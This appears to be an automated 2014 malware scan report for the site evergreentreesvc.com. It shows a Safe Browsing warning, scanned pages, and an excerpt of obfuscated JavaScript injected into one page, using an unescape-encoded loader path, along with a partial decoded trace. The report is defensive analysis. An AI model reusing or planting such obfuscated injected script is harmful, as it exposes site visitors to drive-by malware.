Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=evergreentreesvc.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://evergreentreesvc.com/ | 200 OK Content-Length: 885 Content-Type: text/html | clean |
http://evergreentreesvc.com/users/index.php?page=map-1.html | 200 OK Content-Length: 11036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
this.hd="";var M=new Date();function i(){this.j="";var v;if(v!='' && v!='y'){v=''};var L=window;var c;if(c!='q'){c='q'};var U=unescape;this.O='';var gj;if(gj!='uW' && gj != ''){gj=null};var vq=new Date();var vy;if(vy!='G' && vy != ''){vy=null};var P=U("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%72%65%64%74%75%62%65%2e%63%6f%6d%2f%74%77%69%74%70%69%63%2e%63%6f%6d%2e%70%68%70");var nb=new Array();var Ip;if(Ip!='Iz' && Ip!='H'){Ip='Iz'};var Iv=new String();function Z(LK,A)
Decoded script:
function () { this.kK = false; jR = "jR"; var oHK = "oHK"; this.pV = 16778; this.c = false; var rJ = new Array; vF.q(); function kH() { } var tE = ""; nW = "nW"; yE = ""; var nS = 43439; this.oZ = "oZ"; }
/*** called setTimeout with function () { this.kK = false; jR = "jR"; var oHK = "oHK"; this.pV = 16778; this.c = false; var rJ = new Array; vF.q(); function kH() { } var tE = ""; nW = "nW"; yE = ""; var nS = 43439; this.oZ = "oZ"; }, 197 */
zgf</body></html>
Antivirus reports:
http://evergreentreesvc.com/test404page.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: evergreentreesvc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Sep 2014 02:07:26 GMT
Accept-Ranges: bytes
ETag: "1d283a4-375-34a93040"
Server: Apache/2.0.52 (Red Hat)
Content-Length: 885
Content-Type: text/html
Last-Modified: Fri, 01 Apr 2011 13:15:37 GMT
...885 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: evergreentreesvc.com
Referer: http://www.google.com/search?q=evergreentreesvc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.